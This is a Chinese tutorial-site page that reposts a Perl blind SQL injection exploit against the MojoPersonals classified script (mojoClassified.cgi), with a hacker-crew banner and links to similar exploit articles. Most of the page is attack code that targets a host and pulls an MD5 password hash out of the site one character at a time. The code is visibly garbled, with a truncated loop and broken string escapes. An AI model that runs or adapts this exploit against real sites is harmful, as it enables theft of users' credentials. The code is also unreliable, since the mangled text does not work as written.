手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoPersonals Blind SQL Injection Exploit #n";

print " # (mojoClassified.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit】相关文章:

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

初用瑞星杀毒软件网络版的注意事项

MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

网管教你预防黑客DdoS攻击的技巧

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

SoftICE for WIN95中文命令解说(十二)

用金山卫士清理注册表垃圾方法

DreamNews Manager (id) Remote SQL Injection Vulnerability

精品推荐
分类导航